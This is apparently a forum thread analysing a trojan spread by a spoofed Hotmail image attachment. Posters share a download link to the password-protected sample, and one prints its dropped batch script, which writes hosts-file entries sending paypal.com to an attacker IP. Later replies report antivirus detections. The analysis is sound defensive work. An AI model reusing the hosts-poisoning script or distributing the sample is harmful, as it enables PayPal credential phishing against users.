Skip navigation.
Home

Not detected yet!?

While checking my email yesterday at Hotmail I got an email from a nicole smith. The email was an attachment of what appeared to be a valid jpg file: "nicole256.jpg". When I put my mouse on the image I noticed the link on the status bar was not to the "nicole256.jpg" file but instead to another site "hxxp://201.241.111.30/pics/nicole256.php". needless to say, it was a spoofed link to an "exe" file. I downloaded the file and scanned it with avp kav 7.0 with the very latest definitions and it found nothing. Nope, not even as suspicious. I have included 3 screenshots: what appeared as a suspicious string of the source code of the hotmail page and 2 screen captures of the scan from virus total, several scanners did register it as malware and a couple as suspicious. Is this a new technique/method of infecting? For a long time now, hotmail had always restricted almost all attachments but this one seemed to get by with no problem.

when i submitted the file at KAV site for a scan and it told me the file was
ok.

here is the direct link from rapidshare. no wait time or code to enter just click or right click and use save as. the exectuable in the rar file is a dos rar file so files inside can be extracted.
password is "infected"

copy & paste
download:
http://rapidshare.com/files/94036809/Nicole256.rar.html

or

click or right click

this is for the executable file.
MD5: 41db2e70747cfc721697619009dd87c8

Cute delphi/bat virus

had .bat content in its overlay..

.bat is created in %temp%

name is always "bt" then random 4 numbers ".bat"
content:


@shift 1
@echo off
echo 201.241.111.30 http://www.paypal.com >>%windir%\System32\drivers\etc\hosts
echo 201.241.111.30 www.paypal.com >>%windir%\System32\drivers\etc\hosts
echo 201.241.111.30 paypal.com >>%windir%\System32\drivers\etc\hosts


[Hotmail Exploit]
MsgContainer=HTML:
"

Te env edo la foto que hab eda olvid

I'm sending you the picture I had forgotten, hopefully you like it, kisses!!

file attached:
Nicole256.jpg

"

the message has 2 $00 bytes..
here: "Te env#00edo la foto que hab#00eda olvid"
wich is prolly also causing trouble for their text processor.. who knows :)

so basicly its a paypal sceam virus+site, i did ping it.. no response so actions have probably been taken on it..

Looks like a Quick Batch

Looks like a Quick Batch File Compiler file.

thanks for the feedback.

thanks for the feedback. KAV finally got it to show up as malicious!
"detected: Trojan program Trojan.BAT.Qhost.u"

®(¯`·._(¯`·._:-.*kreepz86*.-:_.·´¯)_.·´¯)®

Its a Dropper DR/Qhost.U

Avira Antivir reports the file as a dropper DR/Qhost.U

Here's a screen http://img245.imageshack.us/my.php?image=drqhostudroppereq0.jpg This a/v has never let me down... though it gives a fp sometimes but its better to be safe than sorry... Its prevented me from formatting my computer for 4 months now!! This is big as usually when i had norton or some other thing like McAfee installed it wud barely be a month!

http://www.youtube.com/watch?

http://www.youtube.com/watch?v=ODshB09FQ8w